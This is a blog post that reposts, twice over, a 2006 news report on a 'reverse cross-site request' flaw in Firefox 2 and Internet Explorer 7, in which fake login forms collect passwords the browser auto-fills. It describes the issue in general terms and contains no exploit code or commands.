Firefox, IE vulnerable to fake login pages...
December 2006
Mozilla's Firefox 2 and Microsoft's Internet Explorer 7 are vulnerable to a flaw that could allow attackers to steal passwords. Dubbed a reverse cross_site request, or RCSR, vulnerability by its discoverer, Robert Chapin, the flaw lets hackers compromise users' passwords and usernames by presenting them with a fake login form. Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services site. An exploit for this flaw has already been seen on social_networking site MySpace.com, and it could affect anyone using a blog or forum that allows user_generated HTML code to be added, according to Chapin.
According to Chapin, an RCSR attack is much more likely to succeed than a cross_site scripting attack because neither Internet Explorer nor Firefox is designed to check the destination of form data before the user submits them. The browser doesn't sound an alarm because the exploit is conducted at the trusted Website.
Source:http://news.com.com/Firefox%2C+IE+vulnerable+to+fake+login+pages
/2100_1002_3_6137844.html
Mozilla's Firefox 2 and Microsoft's Internet Explorer 7 are vulnerable to a flaw that could allow attackers to steal passwords. Dubbed a reverse cross_site request, or RCSR, vulnerability by its discoverer, Robert Chapin, the flaw lets hackers compromise users' passwords and usernames by presenting them with a fake login form. Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services site. An exploit for this flaw has already been seen on social_networking site MySpace.com, and it could affect anyone using a blog or forum that allows user_generated HTML code to be added, according to Chapin.
According to Chapin, an RCSR attack is much more likely to succeed than a cross_site scripting attack because neither Internet Explorer nor Firefox is designed to check the destination of form data before the user submits them. The browser doesn't sound an alarm because the exploit is conducted at the trusted Website.
Source:http://news.com.com/Firefox%2C+IE+vulnerable+to+fake+login+pages
/2100_1002_3_6137844.html
posted by arkietechs at 9:26 AM
0 Comments:
Post a Comment
<< Home